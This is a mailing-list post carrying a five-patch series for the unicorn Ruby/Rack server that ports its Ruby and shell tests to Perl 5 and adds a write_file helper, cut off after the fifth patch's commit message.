unicorn Ruby/Rack server user+dev discussion/patches/pulls/bugs/help
* [PATCH 0/5] more tests to Perl 5 for stability
From: Eric Wong @ 2024-05-06 20:10 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1394 bytes --]

It's far easier to maintain tests in a language that's been
"dead" for 20 years :P  This is another step towards freeing us
up to make more internal changes, and it also avoids slow Ruby
startup overhead.  (Perl 5 startup is slow, too, but not nearly
as slow as Ruby's.)

Eric Wong (5):
  GNUmakefile: build writes shebang-modified files
  t/*.t: use write_file helper function
  tests: port broken-app test to Perl 5
  tests: move test/unit/test_request.rb to Perl 5
  port test/unit/test_ccc.rb to Perl 5

 GNUmakefile                 |   1 +
 t/active-unix-socket.t      |  13 +--
 t/broken-app.ru             |  13 ---
 t/client_body_buffer_size.t |   5 +-
 t/heartbeat-timeout.t       |   4 +-
 t/integration.ru            |  11 +++
 t/integration.t             | 128 +++++++++++++++++++++++++--
 t/lib.perl                  |   2 +-
 t/reload-bad-config.t       |  17 ++--
 t/reopen-logs.t             |   5 +-
 t/t0009-broken-app.sh       |  56 ------------
 t/winch_ttin.t              |   7 +-
 t/working_directory.t       |  16 +---
 test/unit/test_ccc.rb       |  92 -------------------
 test/unit/test_request.rb   | 170 ------------------------------------
 15 files changed, 153 insertions(+), 387 deletions(-)
 delete mode 100644 t/broken-app.ru
 delete mode 100755 t/t0009-broken-app.sh
 delete mode 100644 test/unit/test_ccc.rb
 delete mode 100644 test/unit/test_request.rb

[-- Attachment #2: 0001-GNUmakefile-build-writes-shebang-modified-files.patch --]
[-- Type: text/x-diff, Size: 772 bytes --]

From 5e9dbfd071aa939677aaf3d269115fb88e606311 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:35 +0000
Subject: [PATCH 1/5] GNUmakefile: build writes shebang-modified files

This makes it easier to run individual integration tests via
prove(1) rather than all at once with gmake(1).
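
For example, after `gmake build', a single test can then be run
on its own with `prove -v t/integration.t' (assuming the prove(1)
that ships with Perl's Test::Harness).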
---
 GNUmakefile | 1 +
 1 file changed, 1 insertion(+)

diff --git a/GNUmakefile b/GNUmakefile
index 70e7e10..227842c 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -78,6 +78,7 @@ man1_bins := $(addsuffix .1, $(base_bins))
 man1_paths := $(addprefix man/man1/, $(man1_bins))
 tmp_bins = $(addprefix $(tmp_bin)/, unicorn unicorn_rails)
 pid := $(shell echo $$PPID)
+build: $(tmp_bins)
 
 $(tmp_bin)/%: bin/% | $(tmp_bin)
 	$(INSTALL) -m 755 $< $@.$(pid)

[-- Attachment #3: 0002-t-.t-use-write_file-helper-function.patch --]
[-- Type: text/x-diff, Size: 8088 bytes --]

From 9cbf87fd110acc36c3b6eec14231aed3be78ecf4 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:36 +0000
Subject: [PATCH 2/5] t/*.t: use write_file helper function

This shortens the tests a bit for readability.
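
For illustration, a single write_file call (the helper lives in
t/lib.perl) replaces the usual open/print/close dance; the
filename and contents below are just an example taken from one
of the hunks in this patch:

	write_file '>', $u_conf, <<EOM;
stderr_path "$err_log"
EOM

instead of:

	open my $fh, '>', $u_conf;
	print $fh <<EOM;
stderr_path "$err_log"
EOM
	close $fh;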
---
 t/active-unix-socket.t      | 13 +++----------
 t/client_body_buffer_size.t |  5 ++---
 t/heartbeat-timeout.t       |  4 +---
 t/integration.t             |  5 ++---
 t/reload-bad-config.t       | 17 ++++++-----------
 t/reopen-logs.t             |  5 +----
 t/winch_ttin.t              |  7 ++-----
 t/working_directory.t       | 16 ++++------------
 8 files changed, 21 insertions(+), 51 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index ff731b5..ab3c973 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -11,29 +11,22 @@ END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 {
-	open my $fh, '>', "$tmpdir/u1.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u1.conf.rb", <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
 stderr_path "$err_log"
 EOM
-	close $fh;
-
-	open $fh, '>', "$tmpdir/u2.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u2.conf.rb", <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u2"
 stderr_path "$tmpdir/err2.log"
 EOM
-	close $fh;
 
-	open $fh, '>', "$tmpdir/u3.conf.rb";
-	print $fh <<EOM;
+	write_file '>', "$tmpdir/u3.conf.rb", <<EOM;
 pid "$tmpdir/u3.pid"
 listen "$u1"
 stderr_path "$tmpdir/err3.log"
 EOM
-	close $fh;
 }
 
 my @uarg = qw(-D -E none t/integration.ru);
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index d479901..c8e871d 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -4,11 +4,10 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-open my $conf_fh, '>', $u_conf;
-$conf_fh->autoflush(1);
-print $conf_fh <<EOM;
+my $conf_fh = write_file '>', $u_conf, <<EOM;
 client_body_buffer_size 0
 EOM
+$conf_fh->autoflush(1);
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $u_conf);
diff --git a/t/heartbeat-timeout.t b/t/heartbeat-timeout.t
index 694867a..0ae0764 100644
--- a/t/heartbeat-timeout.t
+++ b/t/heartbeat-timeout.t
@@ -6,14 +6,12 @@ use autodie;
 use Time::HiRes qw(clock_gettime CLOCK_MONOTONIC);
 mkdir "$tmpdir/alt";
 my $srv = tcp_server();
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$tmpdir/pid"
 preload_app true
 stderr_path "$err_log"
 timeout 3 # WORST FEATURE EVER
 EOM
-close $fh;
 
 my $ar = unicorn(qw(-E none t/heartbeat-timeout.ru -c), $u_conf, { 3 => $srv });
 
diff --git a/t/integration.t b/t/integration.t
index d17ace0..93480fa 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -18,13 +18,12 @@ if ('ensure Perl does not set SO_KEEPALIVE by default') {
 	$val = getsockopt($srv, SOL_SOCKET, SO_KEEPALIVE);
 }
 my $t0 = time;
-open my $conf_fh, '>', $u_conf;
-$conf_fh->autoflush(1);
 my $u1 = "$tmpdir/u1";
-print $conf_fh <<EOM;
+my $conf_fh = write_file '>', $u_conf, <<EOM;
 early_hints true
 listen "$u1"
 EOM
+$conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
 local $ENV{NO_PROXY} = '*'; # for curl
diff --git a/t/reload-bad-config.t b/t/reload-bad-config.t
index c023b88..4c17968 100644
--- a/t/reload-bad-config.t
+++ b/t/reload-bad-config.t
@@ -6,32 +6,27 @@ use autodie;
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $ru = "$tmpdir/config.ru";
-my $u_conf = "$tmpdir/u.conf.rb";
 
-open my $fh, '>', $ru;
-print $fh <<'EOM';
+write_file '>', $ru, <<'EOM';
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 config = ru = "hello world\n" # check for config variable conflicts, too
 run lambda { |env| [ 200, {}, [ ru.to_s ] ] }
 EOM
-close $fh;
 
-open $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 preload_app true
 stderr_path "$err_log"
 EOM
-close $fh;
 
 my $ar = unicorn(qw(-E none -c), $u_conf, $ru, { 3 => $srv });
 my ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid at start');
 is($bdy, "hello world\n", 'body matches expected');
 
-open $fh, '>>', $ru;
-say $fh '....this better be a syntax error in any version of ruby...';
-close $fh;
+write_file '>>', $ru, <<'EOM';
+....this better be a syntax error in any version of ruby...
+EOM
 
 $ar->do_kill('HUP'); # reload
 my @l;
@@ -42,7 +37,7 @@ for (1..1000) {
 }
 diag slurp($err_log) if $ENV{V};
 ok(grep(/error reloading/, @l), 'got error reloading');
-open $fh, '>', $err_log;
+open my $fh, '>', $err_log; # truncate
 close $fh;
 
 ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
diff --git a/t/reopen-logs.t b/t/reopen-logs.t
index 76a4dbd..14bc6ef 100644
--- a/t/reopen-logs.t
+++ b/t/reopen-logs.t
@@ -4,14 +4,11 @@
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 my $srv = tcp_server();
-my $u_conf = "$tmpdir/u.conf.rb";
 my $out_log = "$tmpdir/out.log";
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 stderr_path "$err_log"
 stdout_path "$out_log"
 EOM
-close $fh;
 
 my $auto_reap = unicorn('-c', $u_conf, 't/reopen-logs.ru', { 3 => $srv } );
 my ($status, $hdr, $bdy) = do_req($srv, 'GET / HTTP/1.0');
diff --git a/t/winch_ttin.t b/t/winch_ttin.t
index c507959..3a3d430 100644
--- a/t/winch_ttin.t
+++ b/t/winch_ttin.t
@@ -4,13 +4,11 @@
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 use POSIX qw(mkfifo);
-my $u_conf = "$tmpdir/u.conf.rb";
 my $u_sock = "$tmpdir/u.sock";
 my $fifo = "$tmpdir/fifo";
 mkfifo($fifo, 0666) or die "mkfifo($fifo): $!";
 
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$tmpdir/pid"
 listen "$u_sock"
 stderr_path "$err_log"
@@ -19,11 +17,10 @@ after_fork do |server, worker|
   File.open("$fifo", "wb") { |fp| fp.syswrite worker.nr.to_s }
 end
 EOM
-close $fh;
 
 unicorn('-D', '-c', $u_conf, 't/integration.ru')->join;
 is($?, 0, 'daemonized properly');
-open $fh, '<', "$tmpdir/pid";
+open my $fh, '<', "$tmpdir/pid";
 chomp(my $pid = <$fh>);
 ok(kill(0, $pid), 'daemonized PID works');
 my $quit = sub { kill('QUIT', $pid) if $pid; $pid = undef };
diff --git a/t/working_directory.t b/t/working_directory.t
index f9254eb..f1c0a35 100644
--- a/t/working_directory.t
+++ b/t/working_directory.t
@@ -5,15 +5,13 @@ use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
 mkdir "$tmpdir/alt";
 my $ru = "$tmpdir/alt/config.ru";
-open my $fh, '>', $u_conf;
-print $fh <<EOM;
+write_file '>', $u_conf, <<EOM;
 pid "$pid_file"
 preload_app true
 stderr_path "$err_log"
 working_directory "$tmpdir/alt" # the whole point of this test
 before_fork { |_,_| \$master_ppid = Process.ppid }
 EOM
-close $fh;
 
 my $common_ru = <<'EOM';
 use Rack::ContentLength
@@ -21,12 +19,10 @@ use Rack::ContentType, 'text/plain'
 run lambda { |env| [ 200, {}, [ "#{$master_ppid}\n" ] ] }
 EOM
 
-open $fh, '>', $ru;
-print $fh <<EOM;
+write_file '>', $ru, <<EOM;
 #\\--daemonize --listen $u_sock
 $common_ru
 EOM
-close $fh;
 
 unicorn('-c', $u_conf)->join; # will daemonize
 chomp($daemon_pid = slurp($pid_file));
@@ -39,9 +35,7 @@ check_stderr;
 
 if ('test without CLI switches in config.ru') {
 	truncate $err_log, 0;
-	open $fh, '>', $ru;
-	print $fh $common_ru;
-	close $fh;
+	write_file '>', $ru, $common_ru;
 
 	unicorn('-D', '-l', $u_sock, '-c', $u_conf)->join; # will daemonize
 	chomp($daemon_pid = slurp($pid_file));
@@ -68,8 +62,7 @@ if ('ensures broken working_directory (missing config.ru) is OK') {
 if ('fooapp.rb (not config.ru) works with working_directory') {
 	truncate $err_log, 0;
 	my $fooapp = "$tmpdir/alt/fooapp.rb";
-	open $fh, '>', $fooapp;
-	print $fh <<EOM;
+	write_file '>', $fooapp, <<EOM;
 class Fooapp
   def self.call(env)
     b = "dir=#{Dir.pwd}"
@@ -78,7 +71,6 @@ class Fooapp
   end
 end
 EOM
-	close $fh;
 	my $srv = tcp_server;
 	my $auto_reap = unicorn(qw(-c), $u_conf, qw(-I. fooapp.rb),
 				{ -C => '/', 3 => $srv });

[-- Attachment #4: 0003-tests-port-broken-app-test-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 4208 bytes --]

From e61a1152a613032927613b805a46c4d831bad00c Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:37 +0000
Subject: [PATCH 3/5] tests: port broken-app test to Perl 5

Save some inodes and startup time by folding it into the
integration test.
---
 t/broken-app.ru       | 13 ----------
 t/integration.ru      |  1 +
 t/integration.t       | 18 +++++++++++++-
 t/lib.perl            |  2 +-
 t/t0009-broken-app.sh | 56 -------------------------------------------
 5 files changed, 19 insertions(+), 71 deletions(-)
 delete mode 100644 t/broken-app.ru
 delete mode 100755 t/t0009-broken-app.sh

diff --git a/t/broken-app.ru b/t/broken-app.ru
deleted file mode 100644
index 5966bff..0000000
--- a/t/broken-app.ru
+++ /dev/null
@@ -1,13 +0,0 @@
-# frozen_string_literal: false
-# we do not want Rack::Lint or anything to protect us
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
-map "/" do
-  run lambda { |env| [ 200, {}, [ "OK\n" ] ] }
-end
-map "/raise" do
-  run lambda { |env| raise "BAD" }
-end
-map "/nil" do
-  run lambda { |env| nil }
-end
diff --git a/t/integration.ru b/t/integration.ru
index 6df481c..3a0d99c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -100,6 +100,7 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/nil'; nil
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 93480fa..c9a7877 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -122,7 +122,23 @@ check_stderr;
 ($status, $hdr, $bdy) = do_req($srv, 'GET /broken_app HTTP/1.0');
 like($status, qr!\AHTTP/1\.[0-1] 500\b!, 'got 500 error on broken endpoint');
 is($bdy, undef, 'no response body after exception');
-truncate($errfh, 0);
+seek $errfh, 0, SEEK_SET;
+{
+	my $nxt;
+	while (!defined($nxt) && defined($_ = <$errfh>)) {
+		$nxt = <$errfh> if /app error/;
+	}
+	ok $nxt, 'got app error' and
+		like $nxt, qr/\bintegration\.ru/, 'got backtrace';
+}
+seek $errfh, 0, SEEK_SET;
+truncate $errfh, 0;
+
+($status, $hdr, $bdy) = do_req($srv, 'GET /nil HTTP/1.0');
+like($status, qr!\AHTTP/1\.[0-1] 500\b!, 'got 500 error on nil endpoint');
+like slurp($err_log), qr/app error/, 'exception logged for nil';
+seek $errfh, 0, SEEK_SET;
+truncate $errfh, 0;
 
 my $ck_early_hints = sub {
 	my ($note) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index 8c842b1..382f08c 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -30,7 +30,7 @@ $pid_file = "$tmpdir/pid";
 $fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
-open($errfh, '>>', $err_log);
+open($errfh, '+>>', $err_log);
 
 if (my $t = $ENV{TAIL}) {
 	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
diff --git a/t/t0009-broken-app.sh b/t/t0009-broken-app.sh
deleted file mode 100755
index 895b178..0000000
--- a/t/t0009-broken-app.sh
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-
-t_plan 9 "graceful handling of broken apps"
-
-t_begin "setup and start" && {
-	unicorn_setup
-	unicorn -E none -D broken-app.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "normal response is alright" && {
-	test xOK = x"$(curl -sSf http://$listen/)"
-}
-
-t_begin "app raised exception" && {
-	curl -sSf http://$listen/raise 2> $tmp || :
-	grep -F 500 $tmp
-	> $tmp
-}
-
-t_begin "app exception logged and backtrace not swallowed" && {
-	grep -F 'app error' $r_err
-	grep -A1 -F 'app error' $r_err | tail -1 | grep broken-app.ru:
-	dbgcat r_err
-	> $r_err
-}
-
-t_begin "trigger bad response" && {
-	curl -sSf http://$listen/nil 2> $tmp || :
-	grep -F 500 $tmp
-	> $tmp
-}
-
-t_begin "app exception logged" && {
-	grep -F 'app error' $r_err
-	> $r_err
-}
-
-t_begin "normal responses alright afterwards" && {
-	> $tmp
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	curl -sSf http://$listen/ >> $tmp &
-	wait
-	test xOK = x$(sort < $tmp | uniq)
-}
-
-t_begin "teardown" && {
-	kill $unicorn_pid
-}
-
-t_begin "check stderr" && check_stderr
-
-t_done

[-- Attachment #5: 0004-tests-move-test-unit-test_request.rb-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11298 bytes --]

From 01224642a20e91de5ea18c6f20856142158068a8 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:38 +0000
Subject: [PATCH 4/5] tests: move test/unit/test_request.rb to Perl 5

Another step towards having more freedom to change our internals.
Keeping tests in a more stable language also reduces maintenance
overhead by avoiding Ruby incompatibilities.
---
 t/integration.ru          |   6 ++
 t/integration.t           |  72 +++++++++++++++-
 test/unit/test_request.rb | 170 --------------------------------------
 3 files changed, 75 insertions(+), 173 deletions(-)
 delete mode 100644 test/unit/test_request.rb

diff --git a/t/integration.ru b/t/integration.ru
index 3a0d99c..a6b022a 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,7 @@ def env_dump(env)
     else
       case k
       when 'rack.version', 'rack.after_reply'; h[k] = v
+      when 'rack.input'; h[k] = v.class.to_s
       end
     end
   end
@@ -112,6 +113,11 @@ def rack_input_tests(env)
   when 'PUT'
     case env['PATH_INFO']
     when %r{\A/rack_input}; rack_input_tests(env)
+    when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
+    end
+  when 'OPTIONS'
+    case env['REQUEST_URI']
+    when '*'; [ 200, {}, [ env_dump(env) ] ]
     end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index c9a7877..3b1d6df 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -103,14 +103,75 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	($status, $hdr, my $json) = do_req $srv, 'GET /env_dump';
+	my $get_json = sub {
+		my (@req) = @_;
+		my @r = do_req $srv, @req;
+		my $env = eval { JSON::PP->new->decode($r[2]) };
+		diag "$@ (r[2]=$r[2])" if $@;
+		is ref($env), 'HASH', "@req response body is JSON";
+		(@r, $env)
+	};
+	($status, $hdr, my $json, my $env) = $get_json->('GET /env_dump');
 	is($status, undef, 'no status for HTTP/0.9');
 	is($hdr, undef, 'no header for HTTP/0.9');
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
-	my $env = JSON::PP->new->decode($json);
-	is(ref($env), 'HASH', 'JSON decoded body to hashref');
 	is($env->{SERVER_PROTOCOL}, 'HTTP/0.9', 'SERVER_PROTOCOL is 0.9');
+	is $env->{'rack.url_scheme'}, 'http', 'rack.url_scheme default';
+	is $env->{'rack.input'}, 'StringIO', 'StringIO for no content';
+
+	my $req = 'OPTIONS *';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '', "$req => PATH_INFO";
+	is $env->{REQUEST_URI}, '*', "$req => REQUEST_URI";
+
+	$req = 'GET http://e:3/env_dump?y=z';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, 'y=z', "$req => QUERY_STRING";
+
+	$req = 'GET http://e:3/env_dump#frag';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, '', "$req => QUERY_STRING";
+	is $env->{FRAGMENT}, 'frag', "$req => FRAGMENT";
+
+	$req = 'GET http://e:3/env_dump?a=b#frag';
+	($status, $hdr, $json, $env) = $get_json->("$req HTTP/1.0");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{QUERY_STRING}, 'a=b', "$req => QUERY_STRING";
+	is $env->{FRAGMENT}, 'frag', "$req => FRAGMENT";
+
+	for my $proto (qw(https http)) {
+		$req = "X-Forwarded-Proto: $proto";
+		($status, $hdr, $json, $env) = $get_json->(
+						"GET /env_dump HTTP/1.0\r\n".
+						"X-Forwarded-Proto: $proto");
+		is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+		is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+		is $env->{'rack.url_scheme'}, $proto, "$req => rack.url_scheme";
+	}
+
+	$req = 'X-Forwarded-Proto: ftp'; # invalid proto
+	($status, $hdr, $json, $env) = $get_json->(
+					"GET /env_dump HTTP/1.0\r\n".
+					"X-Forwarded-Proto: ftp");
+	is $env->{REQUEST_PATH}, '/env_dump', "$req => REQUEST_PATH";
+	is $env->{PATH_INFO}, '/env_dump', "$req => PATH_INFO";
+	is $env->{'rack.url_scheme'}, 'http', "$req => rack.url_scheme";
+
+	($status, $hdr, $json, $env) = $get_json->("PUT /env_dump HTTP/1.0\r\n".
+						'Content-Length: 0');
+	is $env->{'rack.input'}, 'StringIO', 'content-length: 0 uses StringIO';
+
+	($status, $hdr, $json, $env) = $get_json->("PUT /env_dump HTTP/1.0\r\n".
+						'Content-Length: 1');
+	is $env->{'rack.input'}, 'Unicorn::TeeInput',
+		'content-length: 1 uses TeeInput';
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
@@ -179,6 +240,11 @@ if ('bad requests') {
 	($status, $hdr) = do_req $srv, 'GET /env_dump HTTP/1/1';
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
+	for my $abs_uri (qw(ssh+http://e/ ftp://e/x http+ssh://e/x)) {
+		($status, $hdr) = do_req $srv, "GET $abs_uri HTTP/1.0";
+		like $status, qr!\AHTTP/1\.[01] 400 \b!, "400 on $abs_uri";
+	}
+
 	$c = tcp_start($srv);
 	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
deleted file mode 100644
index 9d1b350..0000000
--- a/test/unit/test_request.rb
+++ /dev/null
@@ -1,170 +0,0 @@
-# -*- encoding: binary -*-
-# frozen_string_literal: false
-
-# Copyright (c) 2009 Eric Wong
-# You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
-# the GPLv2+ (GPLv3+ preferred)
-
-require './test/test_helper'
-
-include Unicorn
-
-class RequestTest < Test::Unit::TestCase
-
-  MockRequest = Class.new(StringIO)
-
-  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
-
-  def setup
-    @request = HttpRequest.new
-    @app = lambda do |env|
-      [ 200, { 'content-length' => '0', 'content-type' => 'text/plain' }, [] ]
-    end
-    @lint = Rack::Lint.new(@app)
-  end
-
-  def test_options
-    client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '', env['REQUEST_PATH']
-    assert_equal '', env['PATH_INFO']
-    assert_equal '*', env['REQUEST_URI']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_query
-    client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal 'y=z', env['QUERY_STRING']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_fragment
-    client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal '', env['QUERY_STRING']
-    assert_equal 'frag', env['FRAGMENT']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_with_query_and_fragment
-    client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal '/x', env['REQUEST_PATH']
-    assert_equal '/x', env['PATH_INFO']
-    assert_equal 'a=b', env['QUERY_STRING']
-    assert_equal 'frag', env['FRAGMENT']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_absolute_uri_unsupported_schemes
-    %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
-      client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
-                               "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
-    end
-  end
-
-  def test_x_forwarded_proto_https
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: https\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "https", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_x_forwarded_proto_http
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: http\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_x_forwarded_proto_invalid
-    client = MockRequest.new("GET / HTTP/1.1\r\n" \
-                             "X-Forwarded-Proto: ftp\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_rack_lint_get
-    client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal "http", env['rack.url_scheme']
-    assert_equal '127.0.0.1', env['REMOTE_ADDR']
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_no_content_stringio
-    client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal StringIO, env['rack.input'].class
-  end
-
-  def test_zero_content_stringio
-    client = MockRequest.new("PUT / HTTP/1.1\r\n" \
-                             "Content-Length: 0\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal StringIO, env['rack.input'].class
-  end
-
-  def test_real_content_not_stringio
-    client = MockRequest.new("PUT / HTTP/1.1\r\n" \
-                             "Content-Length: 1\r\n" \
-                             "Host: foo\r\n\r\n")
-    env = @request.read_headers(client, AI)
-    assert_equal Unicorn::TeeInput, env['rack.input'].class
-  end
-
-  def test_rack_lint_put
-    client = MockRequest.new(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: foo\r\n" \
-      "Content-Length: 5\r\n" \
-      "\r\n" \
-      "abcde")
-    env = @request.read_headers(client, AI)
-    assert ! env.include?(:http_body)
-    assert_kind_of Array, @lint.call(env)
-  end
-
-  def test_rack_lint_big_put
-    count = 100
-    bs = 0x10000
-    buf = (' ' * bs).freeze
-    length = bs * count
-    client = Tempfile.new('big_put')
-    client.syswrite(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: foo\r\n" \
-      "Content-Length: #{length}\r\n" \
-      "\r\n")
-    count.times { assert_equal bs, client.syswrite(buf) }
-    assert_equal 0, client.sysseek(0)
-    env = @request.read_headers(client, AI)
-    assert ! env.include?(:http_body)
-    assert_equal length, env['rack.input'].size
-    count.times {
-      tmp = env['rack.input'].read(bs)
-      tmp << env['rack.input'].read(bs - tmp.size) if tmp.size != bs
-      assert_equal buf, tmp
-    }
-    assert_nil env['rack.input'].read(bs)
-    env['rack.input'].rewind
-    assert_kind_of Array, @lint.call(env)
-  end
-end

[-- Attachment #6: 0005-port-test-unit-test_ccc.rb-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6013 bytes --]

From d6d127f50f9225bf51ef6ce0abce9bad87efaae3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:39 +0000
Subject: [PATCH 5/5] port test/unit/test_ccc.rb to Perl 5

We'll fold this into integration.t to reduce startup time
penalties and get the benefit of a stable language, cutting
maintenance overhead.
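
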